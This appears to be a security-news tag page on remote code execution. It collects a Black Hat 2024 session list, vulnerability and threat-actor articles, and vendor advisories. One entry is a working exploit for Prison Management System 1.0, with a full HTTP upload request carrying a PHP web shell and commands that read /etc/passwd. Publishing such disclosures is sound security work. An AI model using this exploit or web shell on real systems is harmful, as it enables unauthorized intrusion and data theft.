This year's conference will be a treasure trove of insights for cybersecurity professionals.

Meny Har, CEO & Co-Founder, Opus Security

July 29, 2024

3 Min Read

Source: Anton Gvozdikov via Alamy Stock Photo

COMMENTARY

As always, Black Hat USA 2024 promises to be a treasure trove of insights for cybersecurity professionals. The artificial intelligence craze notwithstanding, vulnerability remediation continues to be the core focus for all sizes of organizations seeking to make security more efficient. Understandably, this year's conference promises a variety of approaches, case studies, and informative discussions on this topic. Here are the seven most illuminating sessions we suggest you attend, for insights on discovering, prioritizing, and patching vulnerabilities: 

**Breaching AWS Accounts Through Shadow Resources**

Speakers: Yakir Kadkoda, Michael Katchinskiy, Ofek Itach   
Date: Wednesday, Aug. 7, 10:20 a.m.-11 a.m.   
Tracks: Cloud security, enterprise security

Did you know that six critical vulnerabilities in Amazon Web Services (AWS) have the potential to lead to severe breaches, including remote code execution and information disclosure? This session dives into a methodology for discovering these vulnerabilities, and the speakers will introduce a new open source tool for researching service internal API calls. This session is essential for understanding and mitigating complex cloud vulnerabilities. 

**Predict, Prioritize, Patch: How Microsoft Harnesses LLMs for Security Response**

Speaker: Bill Demirkapi   
Date: Wednesday, Aug. 7, 1:30 p.m.-2:10 p.m.   
Tracks: AI, ML & data science, application security: defense

Joining this session will help you understand more about how Microsoft leverages large language models (LLMs) to streamline security response workflows. Hear about practical applications of LLMs for deriving vulnerability information, predicting report severity, and generating root causes from crash dumps. This is a seminal session for organizations looking to enhance their vulnerability management with AI. 

**Self-Hosted GitHub CI/CD Runners: Continuous Integration, Continuous Destruction**

Speakers: Adnan Khan, John Stawinski   
Date: Wednesday, Aug. 7, 1:30 p.m.-2:10 p.m.   
Tracks: Enterprise security, application security: offense

This technical deep dive addresses the security risks associated with self-hosted CI/CD runners, highlighting critical vulnerabilities discovered in GitHub and other platforms. Attendees will learn how to defend against pipeline poisoning and privilege escalation attacks, which are vital for securing the software development life cycle. 

**The GCP Jenga Tower: Hacking Millions of Google's Servers With a Single Package (and More)**

Speaker: Liv Matan   
Date: Wednesday, Aug. 7, 1:30 p.m.-2:10 p.m.   
Tracks: Cloud security, application security: offense

Explore how a single faulty command in Google Cloud Platform (GCP) led to a critical RCE vulnerability, affecting millions of servers. This session will provide insights into the complexity of cloud services and present tools for uncovering hidden APIs used by cloud providers. Security leaders managing cloud security in their organizations and seeking to understand cloud service vulnerabilities will find this talk invaluable. 

**Will We Survive the Transitive Vulnerability Locusts?**

Speakers: Eyal Paz, Liad Cohen   
Date: Thursday, Aug. 8, 2:30 p.m.-3 p.m.   
Tracks: Application security: defense, exploit development & vulnerability discovery

Learn about the risk of transitive dependencies in software projects, with speakers clearly demonstrating how these vulnerabilities can be exploited. Attendees will learn practical strategies for mitigating these risks and prioritizing vulnerabilities in their threat model, which is crucial for secure software development. 

**Break the Wall From Bottom: Automated Discovery of Protocol-Level Evasion Vulnerabilities in Web Application Firewalls**

Speakers: Qi Wang, Jianjun Chen, Run Guo, Chao Zhang, Haixin Duan   
Date: Thursday, Aug. 8, 2:30 p.m.-3 p.m.   
Tracks: Application security: offense, cloud security

Discover how protocol-level evasion vulnerabilities in WAFs can be exploited to bypass security measures. This session introduces WAF Manis, a novel testing framework that uncovered 311 evasion cases and could be extremely useful for those looking to strengthen their Web application defenses against sophisticated attacks. 

**Are Your Backups Still Immutable, Even Though You Can't Access Them?**

Speakers: Ryan Kane, Rushank Shetty   
Date: Thursday, Aug. 8, 3:20 p.m.-4 p.m.   
Tracks: Enterprise security, application security: offense

This session explores the security of immutable backups, highlighting how attackers can target the infrastructure hosting backup data. Learn the processes, failures, and successes in testing immutable backups, crucial for ensuring data resilience against ransomware attacks.

These sessions and many others on vulnerability remediation are a testament to the growing importance of building a culture of proactive security, by addressing the constantly evolving attack surfaces and staying vigilant. Ensuring that you have a robust vulnerability remediation process is a critical and vital security checkpoint in your organization's security posture. 

**About the Author(s)**

CEO & Co-Founder, Opus Security

Meny Har is the CEO and co-founder of Opus Security, a cloud-native security remediation platform, helping security teams orchestrate remediation processes from start to fix. Before founding Opus, he was part of the founding team and vice president of product with the cloud-native SOAR platform Siemplify, which was acquired by Google Cloud in January 2022. Meny has more than 15 years of cybersecurity experience, with a proven track record of building, validating, and scaling successful products.

7 Sessions Not to Miss at Black Hat USA 2024

Progress Software is urging users to update their Telerik Report Server instances following the discovery of a critical security flaw that could result in remote code execution.
The vulnerability, tracked as CVE-2024-6327 (CVSS score: 9.9), impacts Report Server version 2024 Q2 (10.1.24.514) and earlier.
"In Progress Telerik Report Server versions prior to 2024 Q2 (10.1.24.709), a remote code

Software Security / Vulnerability

Progress Software is urging users to update their Telerik Report Server instances following the discovery of a critical security flaw that could result in remote code execution.

The vulnerability, tracked as **CVE-2024-6327** (CVSS score: 9.9), impacts Report Server version 2024 Q2 (10.1.24.514) and earlier.

"In Progress Telerik Report Server versions prior to 2024 Q2 (10.1.24.709), a remote code execution attack is possible through an insecure deserialization vulnerability," the company said in an advisory.

Deserialization flaws occur when an application reconstructs untrusted data that an attacker has control over without adequate validation in place, resulting in the execution of unauthorized commands.

Progress Software said the flaw has been addressed in version 10.1.24.709. As temporary mitigation, it's recommended to change the user for the Report Server Application Pool to one with limited permission.

Administrators can check if their servers are vulnerable to attacks by going through these steps -

*   Go to the Report Server web UI and log in using an account with administrator rights
*   Open the Configuration page (~/Configuration/Index).
*   Select the About tab and the version number will be displayed in the pane on the right.

The disclosure comes nearly two months after the company patched another critical shortcoming in the same software (CVE-2024-4358, CVSS score: 9.8) that could be abused by a remote attacker to bypass authentication and create rogue administrator users.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Critical Flaw in Telerik Report Server Poses Remote Code Execution Risk

The Andariel group is targeting critical defense, aerospace, nuclear, and engineering companies for data theft, the FBI, NSA, and others said.

Source: DD Images via Shutterstock

A long-known cyber-espionage group working on behalf of North Korea's foreign intelligence service is systematically stealing technical information and intellectual property from organizations in the US and other countries to advance its own nuclear and military programs.

The group — which security vendors track variously as Andariel, Silent Chollima, Onyx Sleet, and Stonefly — is using ransomware attacks on US health care entities to fund the campaign, the US government warned this week.

**A Clear and Present Danger**

In a joint advisory, the FBI, the US Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), and others identified the threat actor as primarily targeting defense, aerospace, nuclear, and engineering organizations in the US, Japan, South Korea, and India. "The authoring agencies believe the group and the cyber techniques remain an ongoing threat to various industry sectors worldwide," the advisory noted.

Meanwhile, the US government offered a $10 million reward under the State Department's Rewards for Justice program for information leading to the arrest of Rim Jong Hyok, whom it believes is a key player in the malicious cyber activity. In tandem, the US Justice Department indicted Jong Hyok on charges related to his involvement in Andariel attacks on multiple US entities, including NASA and two US Air Force bases.

The information that Andariel is pursuing in its current campaign is broad and varied. From defense organizations, the adversary has been stealing information pertaining to heavy and light tanks, self-propelled howitzers, combat ships, autonomous underwater vehicles, and other equipment. Aerospace companies are being targeted for information on everything from fighter aircraft, missiles, and missile defense systems to radars and nano-satellite technology. The goal with attacks on organizations in the nuclear sector is to gather data in areas like uranium processing and enrichment, material waste, and storage. And with engineering firms, the threat actor's focus is on shipbuilding, robotics, additive manufacturing, 3D printing, and other technologies.

"The authoring agencies encourage critical infrastructure organizations to apply patches for vulnerabilities in a timely manner, protect web servers from web shells, monitor endpoints for malicious activities, and strengthen authentication and remote access protections," the advisory said.

**Well-Known Threat Actor**

Andariel has been active for several years. Researchers at Google's Mandiant who track the group as APT45 believe it has been operational since at least 2009. Microsoft, which tracks the threat actor as OnyxSleet, says it first spotted the group in 2014. Over the years, researchers have tied the group to numerous information stealing campaigns and destructive attacks on organizations in more than a dozen critical sectors, including defense, aerospace, energy, financial services, transportation, and health care. Many of its attacks have targeted South Korean entitities.

In a report that coincided with the US government warning this week, Mandiant said it had observed APT45 gradually launching more financially motivated attacks — like ransomware attacks — in recent years, even as it has continued with its cyber espionage mission. "APT45 is one of North Korea’s longest running cyber operators, and the group's activity mirrors the regime's geopolitical priorities even as operations have shifted from classic cyber espionage against government and defense entities to include healthcare and crop science," Mandiant said.

Microsoft also released an update on the North Korean actor this week and has observed Onyx Sleet actors recently switch from spear-phishing as a way to gain initial access to using vulnerability exploits. But otherwise, its tradecraft has remained largely unchanged, Microsoft said. "Onyx Sleet has used the same tactics, techniques, and procedures (TTPs) over extended periods, suggesting the threat actor views its tradecraft as effective."

**Vulnerability Exploits and Custom Tools**

The US government advisory described Andariel as looking for and exploiting multiple well-known vulnerabilities to gain initial access to target networks in its recent attacks. Vulnerabilities that the group has been exploiting in its attacks include the Log4Shell flaw (CVE-2021-44228) in Apache's Log4j software; CVE-2023-46604, a maximum severity bug in Apache ActiveMQ server technology; CVE-2023-34362, a widely exploited remote code execution flaw in Progress Software's MOVEIt file transfer technology; and a similar flaw in Fortra's GoAnywhere software (CVE-2023-0669).

In all, the joint advisory listed 41 CVEs that Andariel actors have exploited to break into target networks as part of its cyberespionage campaign. Of that, 16 were vulnerabilities that various vendors disclosed last year. The oldest flaw in the list is from 2017 — CVE-2017-4946 — a privilege escalation bug in VMWare's V4H and V4PA desktop agents.

Once they gain access to a network, Andariel actors typically use a variety of custom tools and malware to establish remote access, enable lateral movement, and steal data, the advisory said, listing nearly two dozen of them. The tools "include functionality for executing arbitrary commands, keylogging, screenshots, listing files and directories, browser history retrieval, process snooping, creating and writing to files, capturing network connections, and uploading content to command and control," the advisory said. "The tools allow the actors to maintain access to the victim system, with each implant having a designated C2 node."

The advisory describes in detail other tactics, techniques, and procedures that Andariel actors have employed in recent attacks so organizations in the group's crosshairs can take protective measures. It also provides indicators of compromise that organizations can use to check for signs of the threat actor's presence on their network and systems.

**About the Author(s)**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Feds Warn of North Korean Cyberattacks on US Critical Infrastructure

Though IE was officially retired in June 2022, the vulnerability ramped up in January 2023 and has been going strong since.

Source: mundissima via Alamy Stock Photo

Check Point earlier this month discovered a remote code execution vulnerability, tracked as CVE-2024-38112, that impacts Microsoft Windows users and different versions of Windows Server.

The attackers used Windows Internet Shortcut files, which call on the retired Internet Explorer to visit a URL with a hidden malicious extension name and controlled by these threat actors. Because users are opening this URL with Internet Explorer, and not more secure browsers like Chrome or Edge, the threat actor has more advantages in exploiting the victim's device.

The threat actors also use a second method where they "make the victim believe they are opening a PDF file, while in fact, they are downloading and executing a dangerous .hta application," wrote the Check Point researchers.

The Cybersecurity and Infrastructure Security Agency (CISA) has added this high-severity vulnerability to its Known Exploited Vulnerabilities Catalog  Catalog, with its score of 7.5 due to its active exploitation, and mandated that all Windows systems within federal agencies must be updated or shut down by July 30.

Other research shows that of the roughly 500,000 endpoints running Windows 10 and 11, more than 10% of those devices are missing endpoint protection controls and almost 9% lack patch management controls, meaning that these organizations have a significant number of blind spots for attackers to exploit. 

Though Microsoft issued a patch on July 9, some exploits of this vulnerability date back more than a year ago, which means organizations need to act quickly in their mitigation efforts.

**About the Author(s)**

Microsoft's Internet Explorer Gets Revived to Lure in Windows Victims

Prison Management System version 1.0 suffers from an unauthenticated remote shell upload vulnerability.

    # Exploit Title: Prison Management System 1.0 - Unuthenticated RCE# Date: 24.07.2024# Exploit Author: Muhammet Ali Dak# Vendor Homepage: https://www.sourcecodester.com/sql/17287/prison-management-system.html# Software Link: https://www.sourcecodester.com/download-code?nid=17287&title=Prison+Management+System+Using+PHP# Version: 1.0# Tested on: Linux## Unauthenticated users can access /Admin/add-admin.php address and they can upload malicious php file by changing Content-Type to image/jpeg instead of profile picture image without any authentication. POST /Admin/add-admin.php HTTP/1.1Host: 192.168.60.131User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate, brContent-Type: multipart/form-data; boundary=---------------------------84806108511207628902669766678Content-Length: 1055Origin: http://192.168.60.131Connection: keep-aliveReferer: http://192.168.60.131/Admin/add-admin.phpUpgrade-Insecure-Requests: 1Priority: u=0, i-----------------------------84806108511207628902669766678Content-Disposition: form-data; name="txtusername"yuznumara-----------------------------84806108511207628902669766678Content-Disposition: form-data; name="txtfullname"yuznumara-----------------------------84806108511207628902669766678Content-Disposition: form-data; name="txtpassword"yuznumara123-----------------------------84806108511207628902669766678Content-Disposition: form-data; name="txtphone"55353535353-----------------------------84806108511207628902669766678Content-Disposition: form-data; name="avatar"; filename="cmd.php"Content-Type: image/jpeg<?phpif(isset($_REQUEST['cmd'])){        echo "<pre>";        $cmd = ($_REQUEST['cmd']);        system($cmd);        echo "</pre>";        die;}?>Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd-----------------------------84806108511207628902669766678Content-Disposition: form-data; name="btncreate"-----------------------------84806108511207628902669766678--## Malicious file can be seen under the path /uploadImage/Profile/ without any authentication.## With the request http://192.168.60.131/uploadImage/Profile/cmd.php?cmd=whoami the attacker can execute arbitrary command on the application server.

Prison Management System 1.0 Shell Upload

Red Hat Security Advisory 2024-4613-03 - Red Hat OpenShift Container Platform release 4.16.4 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include a code execution vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4613.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: OpenShift Container Platform 4.16.4 bug fix and security update  
Advisory ID:        RHSA-2024:4613-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:4613  
Issue date:         2024-07-24  
Revision:           03  
CVE Names:          CVE-2023-48795  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.16.4 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.16.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.16.4. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHSA-2024:4616

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.16/release_notes/ocp-4-16-release-notes.html

Security Fix(es):

* ssh: Prefix truncation attack on Binary Packet Protocol (BPP)  
(CVE-2023-48795)  
* containers/image: digest type does not guarantee valid type  
(CVE-2024-3727)  
* go-retryablehttp: url might write sensitive information to log file  
(CVE-2024-6104)  
* openssh: Possible remote code execution due to a race condition in signal  
handling affecting Red Hat Enterprise Linux 9 (CVE-2024-6409)  
* golang: net: malformed DNS message can cause infinite loop  
(CVE-2024-24788)  
* golang: net/netip: Unexpected behavior from Is methods for IPv4-mapped  
IPv6 addresses (CVE-2024-24790)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.  
All OpenShift Container Platform 4.16 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.16/updating/updating_a_cluster/updating-cluster-cli.html

Solution:

CVEs:

CVE-2023-48795

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2254210  
https://bugzilla.redhat.com/show_bug.cgi?id=2274767  
https://bugzilla.redhat.com/show_bug.cgi?id=2279814  
https://bugzilla.redhat.com/show_bug.cgi?id=2292787  
https://bugzilla.redhat.com/show_bug.cgi?id=2294000  
https://bugzilla.redhat.com/show_bug.cgi?id=2295085  
https://issues.redhat.com/browse/OCPBUGS-32887  
https://issues.redhat.com/browse/OCPBUGS-34012  
https://issues.redhat.com/browse/OCPBUGS-35303  
https://issues.redhat.com/browse/OCPBUGS-35310  
https://issues.redhat.com/browse/OCPBUGS-35311  
https://issues.redhat.com/browse/OCPBUGS-35836  
https://issues.redhat.com/browse/OCPBUGS-35864  
https://issues.redhat.com/browse/OCPBUGS-36147  
https://issues.redhat.com/browse/OCPBUGS-36317  
https://issues.redhat.com/browse/OCPBUGS-36450  
https://issues.redhat.com/browse/OCPBUGS-36463  
https://issues.redhat.com/browse/OCPBUGS-36673  
https://issues.redhat.com/browse/OCPBUGS-36704  
https://issues.redhat.com/browse/OCPBUGS-36720  
https://issues.redhat.com/browse/OCPBUGS-36759  
https://issues.redhat.com/browse/OCPBUGS-36764  
https://issues.redhat.com/browse/OCPBUGS-36775  
https://issues.redhat.com/browse/OCPBUGS-36777  
https://issues.redhat.com/browse/OCPBUGS-36841  
https://issues.redhat.com/browse/OCPBUGS-36854  
https://issues.redhat.com/browse/OCPBUGS-36862  
https://issues.redhat.com/browse/OCPBUGS-36890  
https://issues.redhat.com/browse/OCPBUGS-36907  
https://issues.redhat.com/browse/OCPBUGS-36959  
https://issues.redhat.com/browse/OCPBUGS-37063  
https://issues.redhat.com/browse/OCPBUGS-37072  
https://issues.redhat.com/browse/OCPBUGS-37241

Red Hat Security Advisory 2024-4613-03

In Spring Cloud Data Flow versions prior to 2.11.4,  a malicious user who has access to the Skipper server api can use a crafted upload request to write an arbitrary file to any location on the file system which could lead to compromising the server

**Remote code execution in Spring Cloud Data Flow**

Critical severity GitHub Reviewed Published Jul 25, 2024 to the GitHub Advisory Database • Updated Jul 25, 2024

GHSA-p528-3mvf-gr87: Remote code execution in Spring Cloud Data Flow

**Why is this Adobe CVE included in the Security Update Guide?**

The vulnerability assigned to this CVE is in Adobe Software which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable.

**How can I see the version of the browser?**

1.  In your Microsoft Edge browser, click on the 3 dots (...) on the very right-hand side of the window
2.  Click on **Help and Feedback**
3.  Click on **About Microsoft Edge**

CVE-2024-39379: Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability

Dolibarr ERP CRM before 19.0.2 was discovered to contain a remote code execution (RCE) vulnerability via the Computed field parameter under the Users Module Setup function.

**Dolibarr ERP CRM vulnerable to remote code execution (RCE)**

High severity GitHub Reviewed Published Jul 24, 2024 to the GitHub Advisory Database • Updated Jul 25, 2024

GHSA-vprp-94p9-5jp8: Dolibarr ERP CRM vulnerable to remote code execution (RCE) 

Red Hat Security Advisory 2024-4713-03 - An update for kpatch-patch is now available for Red Hat Enterprise Linux 9. Issues addressed include code execution and use-after-free vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4713.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: kpatch-patch security updateAdvisory ID:        RHSA-2024:4713-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4713Issue date:         2024-07-23Revision:           03CVE Names:          CVE-2024-36886====================================================================Summary: An update for kpatch-patch is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.Security Fix(es):* kernel: TIPC message reassembly use-after-free remote code execution vulnerability (CVE-2024-36886)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-36886References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2277238

Tag

#rce